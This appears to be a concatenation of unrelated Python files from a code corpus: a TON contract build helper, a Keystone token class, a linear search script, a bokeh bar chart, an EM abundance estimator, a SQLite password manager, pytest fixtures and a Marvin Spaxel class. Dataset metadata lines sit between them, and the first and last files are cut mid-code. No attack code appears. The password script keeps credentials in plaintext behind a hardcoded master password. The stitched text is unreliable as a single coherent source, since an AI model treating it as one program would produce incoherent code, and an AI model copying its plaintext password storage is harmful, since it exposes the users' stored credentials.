from toncli.modules.utils.system.conf import config_folder, executable, getcwd
from toncli.modules.utils.system.log import logger
from toncli.modules.utils.system.project import migrate_project_struction
from toncli.modules.utils.system.project_conf import ProjectConf, TonProjectConfig
# Colour shortcuts for terminal output (blue, green, reset).
bl = Fore.CYAN
gr = Fore.GREEN
rs = Style.RESET_ALL
def build(project_root: str,
          cwd: Optional[str] = None,
          func_args: List[str] = None,
          contracts: List[TonProjectConfig] = None,
          use_tests_lib: bool = False) -> Optional[str]:
    """
    Build func file(s) and save result fift file to location

    :param contracts: contracts to build; defaults to all contracts from the
                      project configuration found under project_root
    :param func_args: add arguments to func
    :param project_root: Files to build in needed order
    :param cwd: If you need to change root of running script pass it here
    :param use_tests_lib: Use stdlib-tests.func and also compile test files
    :return: concatenated compiler output for all builds
    """
    if not contracts:
        project_config = ProjectConf(project_root)
        contracts = project_config.contracts

    if not func_args:
        func_args = []

    output = []

    for contract in contracts:
        output.append(
            build_files(contract.func_files_locations, contract.to_save_location, func_args, cwd,
                        use_tests_lib=use_tests_lib))

        # Tests are prefixed with the tests-helpers library and compiled
        # separately into the tests output location.
        if len(contract.func_tests_files_locations) and use_tests_lib:
            output.append(
                build_files([f"{config_folder}/func-libs/tests-helpers.func", *contract.func_tests_files_locations],
                            contract.to_save_tests_location, [], cwd,
                            use_tests_lib=True))

    # str() because build_files returns None when the compiler printed nothing.
    return "\n".join(list(map(str, output)))
def build_files(func_files_locations: List[str], to_save_location: str, func_args: List[str] = None,
                cwd: Optional[str] = None, use_tests_lib: bool = False):
    """Run the func compiler over *func_files_locations*, writing fift output.

    :param func_files_locations: source files, compiled in the given order
    :param to_save_location: path of the generated fift file
    :param func_args: extra compiler arguments; may be omitted
    :param cwd: working directory for the compiler (defaults to getcwd())
    :param use_tests_lib: link stdlib-tests.func instead of stdlib.func
    :return: decoded compiler stdout, or None when the compiler printed nothing
    """
    # The previous version unpacked *func_args without handling the None
    # default, raising TypeError whenever the argument was omitted.
    if func_args is None:
        func_args = []
    build_command = [os.path.abspath(executable['func']), *func_args, "-o",
                     os.path.abspath(to_save_location), "-SPA",
                     os.path.abspath(
                         f"{config_folder}/func-libs/stdlib.func") if not use_tests_lib else os.path.abspath(
                         f"{config_folder}/func-libs/stdlib-tests.func"),
                     *[os.path.abspath(i) for i in func_files_locations]]

    get_output = subprocess.check_output(build_command, cwd=getcwd() if not cwd else os.path.abspath(cwd))

    if get_output:
        return get_output.decode()
| 2.078125 | 2 |
sysinv/sysinv/sysinv/sysinv/openstack/common/keystone_objects.py | Wind-River/starlingx-config | 0 | 12764971 | <gh_stars>0
#
# Copyright (c) 2015 Wind River Systems, Inc.
#
# SPDX-License-Identifier: Apache-2.0
#
import datetime
import iso8601
from oslo_log import log
LOG = log.getLogger(__name__)
class Token(object):
    """Lightweight wrapper around a Keystone v3 token payload and catalog."""

    def __init__(self, token_data, token_id, region_name):
        self.expired = False
        self.data = token_data
        self.token_id = token_id
        self.region_name = region_name

    def set_expired(self):
        """Mark the token as expired regardless of its expiry timestamp."""
        self.expired = True

    def is_expired(self, within_seconds=300):
        """Return True when the token is expired or expires within *within_seconds*.

        The previous implementation used ``abs(end - now).seconds``, which
        reads only the seconds *component* of the timedelta (0..86399) and
        ignores whole days — a token expiring days in the future could be
        reported as expired, and a long-expired one as valid.
        ``total_seconds()`` on the signed difference gives the real remaining
        lifetime; a non-positive value means the token is already expired.
        """
        if not self.expired:
            end = iso8601.parse_date(self.data['token']['expires_at'])
            now = iso8601.parse_date(datetime.datetime.utcnow().isoformat())
            remaining = (end - now).total_seconds()
            return remaining <= within_seconds
        return True

    def get_id(self):
        """
        Get the identifier of the token.
        """
        return self.token_id

    def _get_service_url(self, service_type, service_name, interface_type):
        """
        Search the catalog of a service for the url based on the interface
        and this token's region.
        Returns: url or None on failure
        """
        for catalog in self.data['token']['catalog']:
            if catalog['type'] == service_type:
                if catalog['name'] == service_name:
                    if len(catalog['endpoints']) != 0:
                        for endpoint in catalog['endpoints']:
                            if ((endpoint['interface'] == interface_type) and
                                    (endpoint['region'] == self.region_name)):
                                return endpoint['url']
        return None

    def get_service_admin_url(self, service_type, service_name):
        """
        Search the catalog of a service for the administrative url
        Returns: admin url or None on failure
        """
        return self._get_service_url(service_type, service_name, 'admin')

    def get_service_internal_url(self, service_type, service_name):
        """
        Search the catalog of a service for the internal url
        Returns: internal url or None on failure
        """
        return self._get_service_url(service_type, service_name, 'internal')

    def get_service_public_url(self, service_type, service_name):
        """
        Search the catalog of a service for the public url
        Returns: public url or None on failure
        """
        return self._get_service_url(service_type, service_name, 'public')

    def get_service_url(self, service_type, service_name):
        # Default lookup uses the admin interface.
        return self.get_service_admin_url(service_type, service_name)
| 2.375 | 2 |
linear_search.py | gsuryalss/searching | 0 | 12764972 | <gh_stars>0
"""
Linear search is used on a collections of items. It relies on the technique of traversing a list from
start to end by exploring properties of all the elements that are found on the way.
The time complexity of the linear search is O(N) because each element in an array is compared only once.
"""
def linear_search(arr_param, item):
    """Scan *arr_param* front to back for *item*.

    Prints the index of the first match and returns True; returns False when
    the value is absent.  O(N): every element is compared at most once.
    """
    found = False
    pos = 0
    while not found and pos < len(arr_param):
        if arr_param[pos] == item:
            found = True
            print("Position", pos)
        else:
            pos += 1
    return found
# Interactive driver: read an array and a target value, then search.
arr = []
print("Linear Search\n")
# array size
m = int(input("Enter the array size:>>"))
# array input (one element per line)
print("Enter the array elements(new line):\n")
for l in range(m):
    arr.append(int(input()))
# input search element
find = int(input("Enter the search value:>>"))
# search the element in input array
print("Value Found" if linear_search(arr, find) else "Value Not Found")
| 4.09375 | 4 |
src/util/constants.py | radandreicristian/traffic-ode | 2 | 12764973 | METR_LA_DATASET_NAME = 'metr_la'
PEMS_BAY_DATASET_NAME = 'pems_bay'
IN_MEMORY = 'mem'
ON_DISK = 'disk'
| 0.847656 | 1 |
Collision/Collision_BarChart.py | ChairOfStructuralMechanicsTUM/Mechanics_Apps | 11 | 12764974 | from bokeh.plotting import figure
from bokeh.models import ColumnDataSource, Range1d, FuncTickFormatter, FixedTicker
from math import pi, floor
#ColourOptions = ["red","blue","green","black","yellow","purple"]
class Collision_BarChart(object):
    """Bokeh bar chart whose bars can be resized later (used to display
    kinetic energy in the collision app)."""

    def __init__(self, xVals, yVals, colours = None, width=None):
        self.xVals = xVals
        self.yVals = yVals
        self.colours = colours
        self.width = width
        self.create_BarChart()

    def create_BarChart(self):
        """Build the figure, one patch per bar, and install the custom x-axis
        tick formatter that maps tick positions back to bar labels."""
        xVals = self.xVals
        yVals = self.yVals
        colours = self.colours
        width = self.width
        Max = 0
        Min = 0
        N = len(xVals)
        # create list of colours (default: all red; a scalar is broadcast)
        if (colours == None):
            colours = list(xVals)
            for i in range(0, N):
                colours[i] = "red"
        else:
            if (not isinstance(colours, list)):
                colours = [colours]
            for i in range(1, N):
                colours.append(colours[0])
        # create list of widths (default: unit width per bar)
        if (width == None):
            width = []
            for i in range(0, N):
                width.append(1)
        # initialise values for loop
        self.fig = figure(tools="")
        self.barSources = []
        x = 0
        places = []
        label_places = []
        # Maps int(100 * tick position) -> label text, consumed by the JS
        # tick formatter below.
        index = {}
        for i in range(0, N):
            # add ColumnDataSource describing each bar (rectangle as a patch)
            self.barSources.append(ColumnDataSource(data=dict(x=[x, x, x + width[i], x + width[i]],
                                                              y=[0, yVals[i], yVals[i], 0])))
            # update Max and Min for y_range
            if (yVals[i] + 1 > Max):
                Max = yVals[i] + 1
            elif (yVals[i] < 0 and yVals[i] - 1 < Min):
                Min = yVals[i] - 1
            # create bar
            self.fig.patch(x='x', y='y', fill_color=colours[i], source=self.barSources[i], line_color=None)
            br = xVals[i].find('\n')
            places.append(x + width[i] / 2.0)
            if (br == -1):
                # single-line label: one tick at the bar centre
                label_places.append(x + width[i] / 2.0)
                index[str(int(100 * (x + width[i] / 2.0)))] = [xVals[i]]
            else:
                # multi-line label: split on '\n' and spread the pieces as
                # separate ticks across the bar width
                label = []
                while (br != -1):
                    label.append(xVals[i][0:br])
                    xVals[i] = xVals[i][br + 1:]
                    br = xVals[i].find('\n')
                label.append(xVals[i])
                N = len(label)
                for j in range(0, N):
                    index[str(int(100 * (x + width[i] * (j + 1) / (N + 1.0))))] = [label[j]]
                    label_places.append((floor(100 * (x + width[i] * (j + 1) / (N + 1.0))) / 100.0))
            # increase x (1 unit of spacing between bars)
            x += width[i] + 1
        # set figure properties
        self.fig.x_range = Range1d(-1, x)
        self.fig.y_range = Range1d(Min, Max)
        self.fig.grid.visible = False
        self.fig.xaxis.major_label_text_font_size = "14pt"
        self.fig.xaxis.major_tick_line_color = None
        self.fig.xaxis.major_label_orientation = pi / 2
        self.fig.yaxis.major_label_orientation = pi / 2
        self.fig.yaxis.axis_label = "Kinetic Energy ( Joule )"
        self.fig.toolbar.logo = None
        # only give x ticks at bars
        self.fig.xaxis[0].ticker = FixedTicker(ticks=label_places)
        # save vals in ColumnDataSource so the JS formatter can look them up
        index_obj = ColumnDataSource(data=index)
        # JS callback: translate the tick position back into its label text
        ticker_func_JS = """
        var idx = tick*100;
        return labels.data[idx.toString()]
        """
        self.index_obj = index_obj
        self.fig.xaxis[0].formatter = FuncTickFormatter(code=ticker_func_JS, args=dict(labels=self.index_obj))

    def change_label(self):
        # Hard-coded tick keys: assumes three unit-width bars at x = 0, 2, 4.
        self.index_obj.data = {'50': [self.xVals[0]], '250': [self.xVals[1]], '450': [self.xVals[2]]}

    def setTitle(self, title):
        # NOTE(review): newer bokeh expects fig.title.text for a string title
        # — confirm against the bokeh version pinned by this app.
        self.fig.title = title

    def getFig(self):
        return self.fig

    # operator[] support.  The original spelled these __getItem__ /
    # __setItem__, which Python never invokes (dunder names are
    # case-sensitive), and __setItem__ was missing the value parameter.
    def __getitem__(self, key):
        return self.barSources[key].data

    def __setitem__(self, key, value):
        self.barSources[key].data = value

    def setHeight(self, key, height):
        """Resize bar *key* to the given height, keeping its x extent."""
        self.barSources[key].data = dict(x=list(self.barSources[key].data['x']), y=[0, height, height, 0])

    def Height(self, height):
        self.fig.height = height

    def Width(self, width):
        self.fig.width = width
| 2.84375 | 3 |
EMAlgorithm.py | marinaRupe/FER.BCsThesis | 1 | 12764975 | <gh_stars>1-10
import math
from TaxonomyTree import TaxonomyTree
from threading import Thread
from multiprocessing import Process
class EMAlgorithm:
    def __init__(self):
        # Taxonomy tree, built asynchronously in start().
        self.taxTree = TaxonomyTree()
        # Read names and candidate genome TIs for the current EM run.
        self.reads, self.genomes = [], []
        # EM parameters: genome abundances (pi) and non-unique mapping rates (delta).
        self.pi_list, self.delta_list = [], []
        # Per-genome prior counts used in the M-step.
        self.a_list, self.b_list = [], []
        # q_list[i][j]: mapping quality weight of read i against genome j.
        self.q_list = []
        # y_list[i]: 1 if read i maps uniquely, else 0.
        self.y_list = []
        self.groups = {} # key - TI
        self.parentTIs = {} # key - TI (get parent TI by organism TI)
    def start(self, alignmentsFile):
        """Run the two-pass EM estimation on a SAM alignments file.

        The taxonomy tree is built in a background thread while the first
        EM pass runs; the second pass is restricted to the best TI per
        taxonomic group.  printResult/getResult are defined elsewhere in
        this class.
        """
        taxTreeThread = Thread(target=self.taxTree.build)
        taxTreeThread.start()
        # First substep: EM over all candidate genomes.
        alignments = self.calculateInitialParameters(alignmentsFile)
        result = self.getResult()
        # Tree must be ready before grouping results by parent taxon.
        taxTreeThread.join()
        print("\nFirst result:\n")
        self.printResult(result)
        bestTIs = self.getBestTIsPerGroup(result)
        # Second substep: EM restricted to the best TI of each group.
        self.calculateInitialParameters(alignmentsFile, alignments, bestTIs)
        result = self.getResult()
        print("\nFinal result:\n")
        self.printResult(result)
def calculateInitialParameters(self, alignmentsFile, alignments={}, bestTIs=[]):
IS_SECOND_STEP = bool(alignments)
self.reads, self.a_list, self.b_list, self.y_list = [], [], [], []
q_dict, map_freq, unique, non_unique = {}, {}, {}, {}
genomes = set()
maxScore = 0
if not IS_SECOND_STEP:
print("\nSetting the initial parameters...")
with open(alignmentsFile) as alignFile:
for line in alignFile:
if not line.startswith('@'):
fields = line.strip().split("\t")
QNAME = fields[0]
RNAME = fields[2] # reference marker gene
if RNAME != "*":
# calculate score
CIGAR = fields[5]
matches = n = 0
num = ''
for i in range(len(CIGAR)):
c = CIGAR[i]
if c.isdigit():
num += c
else:
if c == 'M':
matches += int(num)
n += int(num)
num = ''
score = n / matches
TIs = RNAME.split("|")[3].split(",")
alignments[QNAME] = TIs, score
else:
print("Resetting the parameters...")
for read in alignments:
self.reads.append(read)
TIs, score = alignments[read][0], alignments[read][1]
if score > maxScore:
maxScore = score
if IS_SECOND_STEP:
TIsLeft = []
for TI in TIs:
if TI in bestTIs:
TIsLeft.append(TI)
TIs = TIsLeft
for TI in TIs:
genomes.add(TI)
q_dict[read, TI] = score
map_freq[TI] = map_freq.get(TI, 0) + 1
if len(TIs) == 1:
unique[TI] = unique.get(TI, 0) + 1
else:
non_unique[TI] = non_unique.get(TI, 0) + 1
if len(TIs) == 1:
self.y_list.append(1)
else:
self.y_list.append(0)
self.genomes = list(genomes)
self.q_list = []
for i in range(len(self.reads)):
q_list_for_read = []
for j in range(len(self.genomes)):
q_list_for_read.append(math.exp(q_dict.get((self.reads[i], self.genomes[j]), 0) / maxScore))
self.q_list.append(q_list_for_read)
self.pi_list, self.delta_list = [], []
pi0 = delta0 = 1.0 / len(self.genomes)
for i in range(len(self.genomes)):
freq = map_freq[self.genomes[i]]
unique_reads = unique.get(self.genomes[i], 0)
non_unique_reads = non_unique.get(self.genomes[i], 0)
self.a_list.append(freq + unique_reads)
self.b_list.append(freq + non_unique_reads)
self.pi_list.append(pi0)
self.delta_list.append(delta0)
return alignments
    def EStep(self):
        """E-step: compute responsibilities h[i][j] of genome j for read i.

        Returns (h, h_sum) where h_sum is the normalisation constant.
        NOTE(review): h is normalised by the sum over the WHOLE matrix, not
        per read as in a textbook EM — confirm this matches the model.
        """
        # expectation of parameters
        h = [[0 for j in range(len(self.genomes))] for i in range(len(self.reads))]
        h_sum = 0
        for i in range(len(self.reads)):
            for j in range(len(self.genomes)):
                # pi_j * delta_j^(1 - y_i) * q_ij: delta only applies to
                # non-uniquely mapped reads (y_i == 0).
                h[i][j] = self.pi_list[j] * pow(self.delta_list[j], 1 - self.y_list[i]) * self.q_list[i][j]
                h_sum += h[i][j]
        h = [[h[i][j] / h_sum for j in range(len(self.genomes))] for i in range(len(self.reads))]
        return h, h_sum
def MStep(self, h, N):
    """M-step of the EM algorithm: re-estimate the mixture parameters.

    Args:
        h: responsibilities from ``EStep``, one row per read and one
            column per genome.
        N: total (unnormalised) responsibility mass returned by ``EStep``;
            acts as the effective read count in the pi update.

    Returns:
        Tuple ``(pi_list, delta_list)`` with one entry per genome.
    """
    # maximization of parameters
    pi_list = list()
    delta_list = list()
    # a/b are pseudo-counts gathered while parsing the alignments; they act
    # as prior counts in the pi and delta updates respectively.
    a_sum = sum(self.a_list)
    b_sum = sum(self.b_list)
    for j in range(len(self.genomes)):
        h_j_sum_by_reads = 0
        h_j_with_y_sum_by_reads = 0
        y_sum = 0
        for i in range(len(self.reads)):
            h_j_sum_by_reads += h[i][j]
            # y == 1 marks uniquely mapped reads, so (1 - y) selects the
            # ambiguous reads for the delta update.
            h_j_with_y_sum_by_reads += h[i][j] * (1 - self.y_list[i])
            y_sum += 1 - self.y_list[i]
        pi = self.calculatePi(h_j_sum_by_reads, self.a_list[j], a_sum, N)
        pi_list.append(pi)
        delta = self.calculateDelta(h_j_with_y_sum_by_reads, y_sum, self.b_list[j], b_sum)
        delta_list.append(delta)
    return pi_list, delta_list
def calculateLogLikelihood(self):
    """Return the log-likelihood of the reads under the current parameters.

    The per-read likelihood is the mixture sum over genomes of
    ``pi_j * delta_j**(1 - y_i) * q[i][j]``.
    """
    total = 0
    for i in range(len(self.reads)):
        per_read = sum(
            self.pi_list[j]
            * pow(self.delta_list[j], 1 - self.y_list[i])
            * self.q_list[i][j]
            for j in range(len(self.genomes))
        )
        total += math.log(per_read)
    return total
def getBestTIsPerGroup(self, result):
    """For each parent taxon, keep only the highest-abundance child TI.

    Args:
        result: list of ``(abundance, TI)`` tuples as produced by
            ``getResult``.

    Returns:
        List of the best (highest-abundance) taxon id per parent group.
    """
    print("\nGetting the best TIs per group...")
    for TI in self.genomes:
        # Pair each genome with its abundance looked up from ``result``.
        genome = [r[0] for r in result if r[1] == TI][0], TI
        parentTI = self.taxTree.taxNodes[TI].parent.taxId
        # Keep the child with the largest abundance seen so far for this parent.
        groupGenome = self.groups.get(parentTI, (0, None))
        if genome[0] > groupGenome[0]:
            self.groups[parentTI] = genome
        self.parentTIs[TI] = parentTI
    bestTIs = []
    for group in self.groups:
        bestTIs.append(self.groups[group][1])
    return bestTIs
def getResult(self):
    """Run EM iterations until convergence and return sorted abundances.

    Alternates E and M steps until either the log-likelihood or the
    parameters stop changing by more than EPSILON, then normalises pi into
    relative abundances.

    Returns:
        List of ``(relative_abundance, taxon_id)`` tuples in descending
        order of abundance.
    """
    EPSILON = pow(10, -8)
    finished = False
    log_likelihood = None
    while not finished:
        h, N = self.EStep()
        new_pi_list, new_delta_list = self.MStep(h, N)
        new_log_likelihood = self.calculateLogLikelihood()
        convergency_of_log_likelihood = (log_likelihood is not None) and (abs(new_log_likelihood - log_likelihood) < EPSILON)
        log_likelihood = new_log_likelihood
        # check if algorithm converges
        finished = False
        for i in range(len(self.pi_list)):
            conv_pi = abs(new_pi_list[i] - self.pi_list[i]) < EPSILON
            conv_delta = abs(new_delta_list[i] - self.delta_list[i]) < EPSILON
            convergency_of_parameters = conv_pi and conv_delta
            # NOTE(review): convergence is declared as soon as *one* genome's
            # parameters stabilise (or the likelihood does) -- confirm this is
            # intended rather than requiring all genomes to converge.
            if convergency_of_parameters or convergency_of_log_likelihood:
                finished = True
                break
        if not finished:
            self.pi_list, self.delta_list = new_pi_list, new_delta_list
    # Normalise pi into relative abundances.
    sum_pi = sum(self.pi_list)
    solution = []
    for i in range(len(self.genomes)):
        solution.append((self.pi_list[i] / sum_pi, self.genomes[i]))
    return sorted(solution, reverse=True)
def printResult(self, result):
    """Pretty-print the top abundance estimates and return their taxon ids.

    Fixes over the previous version:
    - a taxon id missing from ``taxonomyNames`` printed ``None`` instead of
      the ``NO_NAME`` placeholder (``.get(TI, None)`` overwrote it);
    - ``TIs.index(TI)`` resolved duplicates to the first occurrence;
    - fewer than five results raised an IndexError.

    Args:
        result: list of ``(relative_abundance, taxon_id)`` tuples, sorted
            in descending order of abundance.

    Returns:
        The taxon ids of the printed entries (at most five).
    """
    NO_NAME = "(no name found)"
    # Never index past the end of a short result list.
    N = min(5, len(result))
    TIs = [genome[1] for genome in result[:N]]
    # Resolve names positionally; fall back to the placeholder so that an
    # unknown taxon id never prints ``None``.
    names = [self.taxTree.taxonomyNames.get(TI, NO_NAME) for TI in TIs]
    for i in range(N):
        print("{}. {}".format(i + 1, names[i]))
        print(" {:10} {:>.8}".format(result[i][1], result[i][0]))
    return TIs
@staticmethod
def calculatePi(h_j_sum_by_R, a_j, a_sum, N):
    """MAP update for genome j's mixture weight.

    (responsibility mass + pseudo-count) / (total mass + total pseudo-counts).
    """
    return (h_j_sum_by_R + a_j) / (N + a_sum)
@staticmethod
def calculateDelta(h_j_with_y_sum_by_R, y_sum, b_j, b_sum):
    """MAP update for genome j's delta over the ambiguous (y == 0) reads."""
    return (h_j_with_y_sum_by_R + b_j) / (y_sum + b_sum)
| 2.453125 | 2 |
text processing in python/process_beta.py | TheBrownViking20/DSstuff | 3 | 12764976 | <reponame>TheBrownViking20/DSstuff<gh_stars>1-10
import os
import glob
from process_alpha import text_process
| 1.210938 | 1 |
teste.py | richardoliveira96/Gerenciador-de-senhas | 0 | 12764977 | import sqlite3
MASTER_PASSWORD = "<PASSWORD>"
senha = input("Insira sua senha master: ")
if senha != MASTER_PASSWORD:
print("Senha inválida! Encerrando ...")
exit()
conn = sqlite3.connect('password.db')
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE IF NOT EXISTS users(
service TEXT NOT NULL,
username TEXT NOT NULL,
password TEXT NOT NULL
);
''')
def menu():
    """Print the interactive command menu to stdout."""
    lines = (
        "***************************************",
        "* i : inserir nova senha *",
        "* l : listar serviços salvos *",
        "* r : recuperar uma senha *",
        "* s : sair *",
        "***************************************",
    )
    for line in lines:
        print(line)
def get_password(service):
    """Print the stored (username, password) rows for *service*.

    Fixes over the previous version:
    - the query was built with an f-string, allowing SQL injection through
      the service name; it is now parameterized;
    - ``cursor.rowcount`` is always -1 for sqlite3 SELECTs, so the
      "not registered" branch could never trigger; we inspect the fetched
      rows instead.
    """
    cursor.execute(
        "SELECT username, password FROM users WHERE service = ?",
        (service,),
    )
    rows = cursor.fetchall()
    if not rows:
        print("Serviço não cadastrado(use 'l' para verificar os serviços).")
    else:
        for user in rows:
            print(user)
def insert_password(service, username, password):
    """Store one credential row and commit immediately.

    Uses a parameterized query so user-supplied values cannot inject SQL
    (the previous version interpolated them with an f-string).
    """
    cursor.execute(
        "insert into users (service, username, password) values (?, ?, ?)",
        (service, username, password),
    )
    conn.commit()
def show_password():
    """Print one row per service name stored in the database."""
    rows = cursor.execute('''
SELECT service FROM users;
''').fetchall()
    for row in rows:
        print(row)
# Interactive command loop: keep prompting until the user chooses 's'.
while True:
    menu()
    op = input("O que deseja fazer ?")
    # Reject anything that is not a known menu key before dispatching.
    if op not in ['l', 'i', 'r', 's']:
        print("Opção inválida")
        continue
    if op == 's':
        break
    if op == 'i':
        service = input('Qual o nome do serviço ? ')
        username = input('Qual o nome do usuário ? ')
        password = input('Qual a senha? ')
        insert_password(service, username, password)
    if op == 'l':
        show_password()
    if op == 'r':
        service = input('Qual o serviço para o qual quer a senha ?')
        get_password(service)

# Release the database connection once the user quits.
conn.close()
bench/bench_long_empty_string.py | janaknat/markupsafe | 415 | 12764978 | <filename>bench/bench_long_empty_string.py
from markupsafe import escape
def run():
    """Benchmark escaping one long, marker-free ASCII string."""
    payload = "Hello World!" * 1000
    escape(payload)
| 1.554688 | 2 |
tests/integration/conftest.py | stonepreston/github-runner-operator | 2 | 12764979 | <filename>tests/integration/conftest.py
from pathlib import Path
import pytest
import yaml
@pytest.fixture
def metadata():
    """Charm metadata parsed from ./metadata.yaml."""
    return yaml.safe_load(Path("./metadata.yaml").read_text())
@pytest.fixture
def model(ops_test):
    """The Juju model provided by the ops_test fixture."""
    return ops_test.model
@pytest.fixture
def application(model, metadata):
    """The deployed application, looked up by the charm's name."""
    return model.applications[metadata["name"]]
@pytest.fixture
def units(application):
    """All units of the application under test."""
    return application.units
| 2 | 2 |
python/marvin/tools/spaxel.py | margudo/marvin | 49 | 12764980 | <gh_stars>10-100
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @Author: <NAME>, <NAME>, and <NAME>
# @Date: 2017-11-03
# @Filename: spaxel.py
# @License: BSD 3-clause (http://www.opensource.org/licenses/BSD-3-Clause)
#
# @Last modified by: <NAME> (<EMAIL>)
# @Last modified time: 2018-11-08 18:00:34
from __future__ import absolute_import, division, print_function
import inspect
import itertools
import warnings
import numpy as np
import marvin
import marvin.core.exceptions
import marvin.core.marvin_pickle
import marvin.tools.cube
import marvin.tools.maps
import marvin.tools.modelcube
import marvin.utils.general.general
from marvin.core.exceptions import MarvinBreadCrumb, MarvinError, MarvinUserWarning
from marvin.utils.datamodel.dap import datamodel as dap_datamodel
from marvin.utils.datamodel.drp import datamodel as drp_datamodel
from marvin.utils.general.structs import FuzzyDict
breadcrumb = MarvinBreadCrumb()
class DataModel(object):
    """A single object that holds the DRP and DAP datamodel."""

    def __init__(self, release):
        # Resolve the release-specific datamodels once so spaxel code can
        # reach both through one attribute.
        self.drp = drp_datamodel[release]
        self.dap = dap_datamodel[release]
class Spaxel(object):
    """A base class that contains information about a spaxel.

    This class represents an spaxel with information from the reduced DRP
    spectrum, the DAP maps properties, and the model spectrum from the DAP
    logcube. A `.SpaxelBase` can be initialised with all or only part of that
    information, and either from a file, a database, or remotely via the
    Marvin API.

    The `~marvin.tools.cube.Cube`, `~marvin.tools.maps.Maps` , and
    `~marvin.tools.modelcube.ModelCube` quantities for the spaxel are available
    in ``cube_quantities``, ``maps_quantities``, and ``modelcube_quantities``,
    respectively. For convenience, the quantities can also be accessed directly
    from the `.SpaxelBase` itself (e.g., ``spaxel.emline_gflux_ha_6465``).

    Parameters:
        x,y (int):
            The `x` and `y` coordinates of the spaxel in the cube (0-indexed).
        cube (`~marvin.tools.cube.Cube` object or path or bool):
            If ``cube`` is a `~marvin.tools.cube.Cube` object, that
            cube will be used for the `.SpaxelBase` instantiation. This mode
            is mostly intended for `~marvin.utils.general.general.getSpaxel`
            as it significantly improves loading time. Otherwise, ``cube`` can
            be ``True`` (default), in which case a cube will be instantiated
            using the input ``filename``, ``mangaid``, or ``plateifu``. If
            ``cube=False``, no cube will be used and the cube associated
            quantities will not be available. ``cube`` can also be the
            path to the DRP cube to use.
        maps (`~marvin.tools.maps.Maps` object or path or bool)
            As ``cube`` but for the DAP measurements corresponding to the
            spaxel in the `.Maps`.
        modelcube (`marvin.tools.modelcube.ModelCube` object or path or bool)
            As ``maps`` but for the DAP measurements corresponding to the
            spaxel in the `.ModelCube`.
        lazy (bool):
            If ``False``, the spaxel data is loaded on instantiation.
            Otherwise, only the metadata is created. The associated quantities
            can be then loaded by calling `.SpaxelBase.load()`.
        kwargs (dict):
            Arguments to be passed to `.Cube`, `.Maps`, and `.ModelCube`
            when (and if) they are initialised.

    Attributes:
        cube_quantities (`~marvin.utils.general.structs.FuzzyDict`):
            A querable dictionary with the `.Spectrum` quantities
            derived from `.Cube` and matching ``x, y``.
        datamodel (object):
            An object containing the DRP and DAP datamodels.
        maps_quantities (`~marvin.utils.general.structs.FuzzyDict`):
            A querable dictionary with the `.AnalysisProperty` quantities
            derived from `.Maps` and matching ``x, y``.
        model_quantities (`~marvin.utils.general.structs.FuzzyDict`):
            A querable dictionary with the `.Spectrum` quantities
            derived from `.ModelCube` and matching ``x, y``.
        ra,dec (float):
            Right ascension and declination of the spaxel. Not available until
            the spaxel has been `loaded <.SpaxelBase.load>`.

    """

    def __init__(self, x, y, cube=True, maps=True, modelcube=True, lazy=False, **kwargs):

        # At least one of the three data sources must be requested.
        if not cube and not maps and not modelcube:
            raise MarvinError('no inputs defined.')

        self.cube_quantities = FuzzyDict({})
        self.maps_quantities = FuzzyDict({})
        self.modelcube_quantities = FuzzyDict({})

        self._cube = cube
        self._maps = maps
        self._modelcube = modelcube

        # Resolve identifying metadata from the keyword arguments first and,
        # failing that, from whichever of the input tools already defines it.
        for attr in ['mangaid', 'plateifu', 'release', 'bintype', 'template']:
            value = kwargs.pop(attr, None) or \
                getattr(cube, attr, None) or \
                getattr(maps, attr, None) or \
                getattr(modelcube, attr, None)
            setattr(self, attr, value)

        self._kwargs = kwargs

        self._parent_shape = None

        # drop breadcrumb
        breadcrumb.drop(message='Initializing MarvinSpaxel {0}'.format(self.__class__),
                        category=self.__class__)

        self.x = int(x)
        self.y = int(y)

        self.loaded = False
        self.datamodel = None

        if lazy is False:
            self.load()

        # Load VACs
        from marvin.contrib.vacs.base import VACMixIn
        self.vacs = VACMixIn.get_vacs(self)

    def __dir__(self):
        """Extend ``dir()`` with the keys of the three quantity dicts."""
        class_members = list(list(zip(*inspect.getmembers(self.__class__)))[0])
        instance_attr = list(self.__dict__.keys())

        items = self.cube_quantities.__dir__()
        items += self.maps_quantities.__dir__()
        items += self.modelcube_quantities.__dir__()
        items += class_members + instance_attr

        return sorted(items)

    def __getattr__(self, value):
        """Fall back to the quantity dictionaries for unknown attributes."""
        # Use __getattribute__ directly to avoid recursing into __getattr__.
        _getattr = super(Spaxel, self).__getattribute__

        for tool_quantity_dict in ['cube_quantities', 'maps_quantities', 'modelcube_quantities']:
            if value in _getattr(tool_quantity_dict):
                return _getattr(tool_quantity_dict)[value]

        return super(Spaxel, self).__getattribute__(value)

    def __repr__(self):
        """Spaxel representation."""

        if not self.loaded:
            return '<Marvin Spaxel (x={0.x:d}, y={0.y:d}, loaded=False)'.format(self)

        # Gets the coordinates relative to the centre of the cube/maps.
        y_mid, x_mid = np.array(self._parent_shape) / 2.
        x_centre = int(self.x - x_mid)
        y_centre = int(self.y - y_mid)

        # Determine what tools are loaded.
        tools = np.array(['cube', 'maps', 'modelcube'])
        load_idx = np.where([self._cube, self._maps, self._modelcube])[0]
        flags = '/'.join(tools[load_idx])

        return ('<Marvin Spaxel (plateifu={0.plateifu}, x={0.x:d}, y={0.y:d}; '
                'x_cen={1:d}, y_cen={2:d}, loaded={3})>'.format(self, x_centre, y_centre, flags))

    def _check_versions(self, attr):
        """Checks that all input object have the same versions.

        Runs sanity checks to make sure that ``attr`` has the same value
        in the input `.Cube`, `.Maps`, and `.ModelCube`. Returns the value
        for the attribute or ``None`` if the attribute does not exist.

        """

        out_value = None

        # Only objects that were actually passed in (not bool flags) count.
        inputs = []
        for obj in [self._cube, self._maps, self._modelcube]:
            if obj is not None and not isinstance(obj, bool):
                inputs.append(obj)

        if len(inputs) == 1:
            return getattr(inputs[0], attr, None)

        # Pairwise comparison: every pair that defines the attribute must agree.
        for obj_a, obj_b in itertools.combinations(inputs, 2):
            if hasattr(obj_a, attr) and hasattr(obj_b, attr):
                assert getattr(obj_a, attr) == getattr(obj_b, attr), \
                    'inconsistent {!r} between {!r} and {!r}'.format(attr, obj_a, obj_b)

            out_value = getattr(obj_a, attr, None) or getattr(obj_b, attr, None)

        return out_value

    def _set_radec(self):
        """Calculates ra and dec for this spaxel."""

        self.ra = None
        self.dec = None

        # Use the first available tool that carries a WCS.
        for obj in [self._cube, self._maps, self._modelcube]:
            if hasattr(obj, 'wcs'):
